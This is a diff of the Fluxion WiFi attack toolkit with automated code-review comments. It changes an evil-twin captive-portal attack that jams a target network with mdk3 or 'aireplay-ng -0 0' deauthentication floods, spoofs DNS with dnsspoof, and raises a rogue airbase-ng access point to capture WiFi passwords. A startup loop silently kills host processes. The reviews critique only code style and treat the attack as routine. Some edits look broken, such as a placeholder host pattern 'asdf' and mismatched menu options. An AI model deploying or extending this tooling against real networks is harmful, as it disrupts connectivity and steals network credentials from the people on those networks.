diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index a2b4592..22866be 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -16,7 +16,7 @@ CaptivePortalAuthenticationMethodsInfo=( # ============= < Virtual Network Configuration > ============ # # To avoid collapsing with an already existing network, # we'll use a somewhat uncommon network and server IP. -CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayAddress="192.169.254.1" CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} @@ -116,7 +116,7 @@ captive_portal_set_ap_interface() { # interface is in used by something else (virtual reservation?). echo "Virtual interface required, attempting." > $FLUXIONOutputDevice if ! iw dev $CaptivePortalJammerInterface interface \ - add ${CaptivePortalJammerInterface}v type monitor \ + add ${CaptivePortalJammerInterface}v type managed \ 2> $FLUXIONOutputDevice; then echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" sleep 5 @@ -154,6 +154,13 @@ function captive_portal_set_ap_service() { captive_portal_unset_ap_service +echo -e "$FLUXIONVLine ${CClr}Select a method of deauthentication\n${CClr}" +echo -e "${CSRed}[${CSYel}1${CSRed}]${CClr} mdk4${CClr}" +echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay${CClr}" +echo -e "${CSRed}[${CSYel}3${CSRed}]${CClr} mdk3\n${CClr}" +read -p $'\e[0;31m[\e[1;34mfluxion\e[1;33m@\e[1;37m'"$HOSTNAME"$'\e[0;31m]\e[0;31m-\e[0;31m[\e[1;33m~\e[0;31m] \e[0m' option_deauth + + if [ "$FLUXIONAuto" ]; then CaptivePortalAPService="hostapd" else 
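Review bot: `192.169.254.1` is outside the RFC 1918 private ranges (only 192.168.0.0/16 is reserved in that neighbourhood), so the new `CaptivePortalGatewayAddress` sits in publicly routable space while the comment above it still only talks about picking an uncommon network. A host that brings this network up presumably shadows the real 192.169.254.0/24 for as long as the interface exists, and the hunk records no reason for leaving private space. Either keep a private prefix or add a comment stating why a public one is needed. The same literal is hard-coded again in the `lib/ap/airbase-ng.sh` hunk (`eval ifconfig at0 192.169.254.1`) instead of reusing this variable.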
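Review bot: The value read into `option_deauth` is never validated, and the later `start_attack` hunk tests it with `[[ $option_deauth -eq 1 ]]`, where bash evaluates both operands as arithmetic expressions instead of comparing text. In a script that presumably runs as root, the input should be restricted to the literal choices before use, e.g. `[[ $option_deauth =~ ^[1-3]$ ]] || option_deauth=""`, and then compared as a string. The prompt also sits above the `if [ "$FLUXIONAuto" ]` check, so an unattended run would block on `read`, and `read` is called without `-r`. The added lines start at column 0 inside `captive_portal_set_ap_service`, whose body continues outside the hunk, and the menu text is hard-coded rather than taken from the language files.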
@@ -725,7 +732,7 @@ index-file.names = ( # Respond with Google's captive response on certain domains. # Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com -\$HTTP[\"host\"] =~ \"((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com\" { +\$HTTP[\"host\"] =~ \"asdf\" { server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\" url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" ) } @@ -734,7 +741,7 @@ index-file.names = ( echo "\ # Redirect all traffic to the captive portal when not emulating a connection. \$HTTP[\"host\"] != \"captive.gateway.lan\" { - url.redirect-code = 302 + url.redirect-code = 307 url.redirect = ( \"^/(.*)\" => \"http://captive.gateway.lan/\", ) 
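Review bot: The host pattern is now the literal `=~ \"asdf\"`, which reads like a debugging placeholder, while the two comment lines directly above still describe a connectivity-check match and list its domains. As committed, the comment documents behaviour the block no longer has. If the block is meant to be disabled, say so in the comment or remove the block; if the placeholder was left in by accident it should not be merged. The `echo` string that holds this configuration starts outside the hunk.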
@@ -742,92 +749,15 @@ index-file.names = ( " >>"$FLUXIONWorkspacePath/lighttpd.conf" fi - # Create a DNS service with python, forwarding all traffic to gateway. + # Create a temporary hosts file to be used with dnsspoof echo "\ -import sys, traceback, socket -# NOTICE: This DNS server works with python 2 and python 3 +${CaptivePortalGatewayAddress} *.* +172.217.5.238 google.com +172.217.13.78 clients3.google.com +172.217.13.78 clients4.google.com +" >"$FLUXIONWorkspacePath/hosts" -class DNSQuery: - def __init__(self, data): - self.data = data - self.domain = '' - - queryType = (ord(data[2]) >> 3) & 15 - - # Only handle basic requests. - if queryType != 0: - print('Ignoring Query: Non-spoofed type.') - return - - domainStart = 13 # Skip length byte and start at domain. - domainLength = ord(data[domainStart - 1]) # Evaluate length byte. - - while domainLength != 0: - self.domain += data[domainStart : domainStart + domainLength] + '.' - - domainStart += domainLength + 1 # Skip the length byte & start at domain. - domainLength = ord(data[domainStart - 1]) # Evaluate length byte. - - def response(self, ipv4): - if not self.domain: return '' - - packet = '' - - packet += self.data[ :2] + '\x81\x80' - packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' - packet += self.data[12:] - packet += '\xc0\x0c' - packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' - - # Convert string IPv4 quads to binary values (bytes). - packet += str.join('', map(lambda s: chr(int(s)), ipv4.split('.'))) - - return packet - -if __name__ == '__main__': - targetIPv4 = '$CaptivePortalGatewayAddress' - - print('Mini DNS Spoofer:: dom.query. 
60 IN A %s' % targetIPv4) - - link = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - link.bind(('',53)) - - try: - while True: - clientData, clientIPv4 = link.recvfrom(1024) - - queryData = clientData if sys.version_info < (3, 0) else clientData.decode('unicode_escape') - - query = DNSQuery(queryData) - - response = query.response(targetIPv4) - - if sys.version_info > (3, 0): - # Someone that knows more about python and how it does byte-handling, - # please fix the following shitfest and make it a bit more elegant. - # Do what? A raw conversion of the \"response\" string to bytes. - responseHex = '' - for xx in response: - responseHex += \"%x%x\" % ((ord(xx) >> 4) & 0b1111, ord(xx) & 0b1111) - - response = bytearray.fromhex(responseHex) - - link.sendto(response, clientIPv4) - - print('Request: %s -> %s' % (query.domain, targetIPv4)) - - except KeyboardInterrupt: - print('INTERRUPT: Stopping.') - link.close() - - except Exception as error: - print('EXCEPTION: Stopping!') - print(error) - print(traceback.format_exc()) - link.close() -" >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - - chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" + #chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"} # Attack arbiter script @@ -1429,7 +1359,7 @@ stop_attack() { CaptivePortalWebServicePID="" # Clear service PID fi - # Kill python DNS service if one is found. + # Kill DNS service if one is found. if [ "$CaptivePortalDNSServiceXtermPID" ]; then kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \ 2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice 
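Review bot: The commented-out `#chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"` refers to a file this hunk no longer creates and should be deleted rather than kept as dead code. The three literal `172.217.x.x` entries are written to `$FLUXIONWorkspacePath/hosts` with no comment saying where the addresses came from or why only these names are listed, and pinned addresses drift from what the names resolve to over time. A comment such as `# Addresses recorded on <date>; re-check before release` would make that maintainable. Any cleanup code that still removes `fluxion_captive_portal_dns.py` is outside this hunk and would need the matching change for the new `hosts` file.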
@@ -1496,7 +1426,7 @@ start_attack() { echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice" xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \ -title "FLUXION AP DNS Service" -e \ - "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & + "dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" & # Save parent's pid, to get to child later. CaptivePortalDNSServiceXtermPID=$! @@ -1519,14 +1449,28 @@ start_attack() { "./$FLUXIONWorkspacePath/captive_portal/deauth-ng.py -i $CaptivePortalJammerInterface -f 5 -c $FluxionTargetChannel -a $FluxionTargetMAC" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! - else + elif [[ $option_deauth -eq 1 ]]; then xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" & # Save parent's pid, to get to child later. CaptivePortalJammerServiceXtermPID=$! + elif [[ $option_deauth -eq 2 ]]; then + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "aireplay-ng -0 0 -a $FluxionTargetMAC --ignore-negative-one $CaptivePortalJammerInterface" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! + + elif [[ $option_deauth -eq 3 ]]; then + + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \ + -title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \ + "mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" & + # Save parent's pid, to get to child later. + CaptivePortalJammerServiceXtermPID=$! fi echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice" 
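Review bot: The `elif` chain has no final `else`, so when `option_deauth` holds anything other than 1, 2 or 3 no process is started and `CaptivePortalJammerServiceXtermPID` keeps whatever value it had before; `stop_attack` could then presumably act on a stale PID. The branches also disagree with the menu added earlier in this diff: option 1 is labelled mdk4 and option 3 mdk3, yet both branches invoke `mdk3`, and branch 3 reads `mdk4_blacklist.lst`, a file nothing visible in the diff creates. The three `xterm` blocks differ only in the command string, so selecting that string in a `case "$option_deauth" in ... esac` with a `*)` arm that clears the PID and reports the invalid choice, followed by a single `xterm` call, would remove the duplication. `start_attack` begins and ends outside the hunk.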
diff --git a/attacks/Captive Portal/language/de.sh b/attacks/Captive Portal/language/de.sh index 3782dbc..87abd50 100755 --- a/attacks/Captive Portal/language/de.sh +++ b/attacks/Captive Portal/language/de.sh @@ -11,7 +11,7 @@ CaptivePortalStaringAPRoutesNotice="Starte den routing Service " CaptivePortalStartingDHCPServiceNotice="Starte den DHCP Service" CaptivePortalStartingDNSServiceNotice="Starte den DNS Service." CaptivePortalStartingWebServiceNotice="Starte den AP" -CaptivePortalStartingJammerServiceNotice="Starte mdk3 als Service" +CaptivePortalStartingJammerServiceNotice="Starte mdk4/aireplay als Service" CaptivePortalStartingAuthenticatorServiceNotice="Authentifizierungsskript wird gestartet" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> CaptivePortalAPServiceQuery="Select an access point service" diff --git a/attacks/Handshake Snooper/language/nl.sh b/attacks/Handshake Snooper/language/nl.sh index 6bfe03c..17ea0ef 100755 --- a/attacks/Handshake Snooper/language/nl.sh +++ b/attacks/Handshake Snooper/language/nl.sh @@ -3,7 +3,7 @@ # description: Acquires WPA/WPA2 encryption hashes. # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -HandshakeSnooperJammerInterfaceQuery="Selecteer eenn interface voor monitoring & jamming." +HandshakeSnooperJammerInterfaceQuery="Selecteer een interface voor monitoring & jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Selecteer een methode voor handshake verkrijgen" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passief$CClr)" 
@@ -23,8 +23,8 @@ HandshakeSnooperStartingArbiterNotice="${CCyn}Handshake Snooper$CClr arbiter dae HandshakeSnooperSnoopingForNSecondsNotice="Snooping voor \$HandshakeSnooperVerifierInterval seconden." HandshakeSnooperStoppingForVerifierNotice="Stop snooper & controle voor hashes." HandshakeSnooperSearchingForHashesNotice="Zoek naar hashes in het capture bestand." -HandshakeSnooperArbiterAbortedWarning="${CYel}Geannuleerd${CClr}: De operatie is geannuleerd been, geen geldige hash gevonden." -HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion's database." +HandshakeSnooperArbiterAbortedWarning="${CYel}Afgebroken${CClr}: De operatie is afgebroken, geen geldige hash gevonden." +HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion database." HandshakeSnooperArbiterCompletedTip="${CBCyn}Handshake Snooper$CBYel aanval afgerond, Sluit dit scherm en start een andere aanval.$CClr" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> diff --git a/fluxion.sh b/fluxion.sh index 38fd042..5b8605b 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -4,6 +4,10 @@ # ================== < FLUXION Parameters > ================== # # ============================================================ # # Path to directory containing the FLUXION executable script. + +for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do + killall $program &> /dev/null + done readonly FLUXIONPath=$(dirname $(readlink -f "$0")) # Path to directory containing the FLUXION library (scripts). @@ -21,8 +25,8 @@ readonly FLUXIONPreferencesFile="$FLUXIONPath/preferences/preferences.conf" readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 -readonly FLUXIONVersion=5 -readonly FLUXIONRevision=9 +readonly FLUXIONVersion=6 +readonly FLUXIONRevision=0 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 
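Review bot: Quoting the command substitution in `for program in "$(airmon-ng check | awk 'NR>6{print $2}')"` makes the loop body run exactly once with the whole multi-line output as a single word, and the unquoted `$program` then relies on word splitting to pass names to `killall`; with empty output `killall` is still invoked, with no argument. The loop runs unconditionally at the top of the script, before `fluxion_startup` has checked the required tools, and stops host processes silently because every message is discarded by `&> /dev/null`. It is also inserted between the comment `# Path to directory containing the FLUXION executable script.` and the `readonly FLUXIONPath=` line that comment documents. Reading the names line by line, `while read -r program; do killall -- "$program"; done < <(airmon-ng check | awk 'NR>6{print $2}')`, placed inside `fluxion_startup` with a notice of what is being stopped, would address these points. The `NR>6` offset depends on the exact layout of the `airmon-ng check` output and deserves a comment.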
@@ -280,7 +284,7 @@ fluxion_startup() { local requiredCLITools=( "aircrack-ng" "bc" "awk:awk|gawk|mawk" "curl" "cowpatty" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" - "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "iwconfig:wireless-tools" "macchanger" "mdk4" "dsniff" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc" ) @@ -352,6 +356,7 @@ fluxion_shutdown() { # Only deallocate fluxion or airmon-ng created interfaces. if [[ "$interface" == "flux"* || "$interface" == *"mon"* || "$interface" == "prism"* ]]; then fluxion_deallocate_interface $interface + systemctl restart network-manager fi done fi diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 397fada..50dba0b 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh @@ -72,7 +72,7 @@ function ap_service_start() { xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ -title "FLUXION AP Service [airbase-ng]" -e \ - airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + airbase-ng -y -e $APServiceSSID -c $APServiceChannel \ -a $APServiceMAC $APServiceInterface & local parentPID=$! @@ -81,7 +81,7 @@ function ap_service_start() { sleep 1 APServicePID=$(pgrep -P $parentPID) done - + eval ifconfig at0 192.169.254.1 ap_service_route }
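Review bot: `"dsniff"` is added as a bare entry, but the neighbouring entries (`"7zr:p7zip"`, `"iwconfig:wireless-tools"`) suggest the format is `binary:package`, and the binary this diff actually invokes is `dnsspoof`. As written the check would look for a `dsniff` executable, so its result says nothing certain about whether `dnsspoof` is present; `"dnsspoof:dsniff"` matches the apparent convention. The code that consumes the array is outside the hunk, so the format is inferred from the visible entries.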
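Review bot: `systemctl restart network-manager` is placed inside the `if` within the interface loop, so it runs once for every matching interface rather than once after all of them have been deallocated. The unit name varies between distributions and the call is unguarded on hosts without systemd or without that service, where it will only print an error during shutdown. Moving it after the loop and guarding it, e.g. `command -v systemctl >/dev/null && systemctl restart network-manager`, restores the host's networking once and only where the tool exists. The loop and `fluxion_shutdown` start outside the hunk.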
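Review bot: `eval ifconfig at0 192.169.254.1` passes a fixed string through `eval` for no benefit, and its exit status is ignored, so a failure to configure the interface goes unnoticed before `ap_service_route` runs. Both the interface name `at0` and the address are literals in a generic AP library, duplicating the value of `CaptivePortalGatewayAddress` set in `attack.sh`, so the two will silently diverge when that variable changes. If the variable is in scope here, prefer `ifconfig at0 "$CaptivePortalGatewayAddress" || return 1`; `ap_service_route` is defined outside this hunk and may already own the addressing.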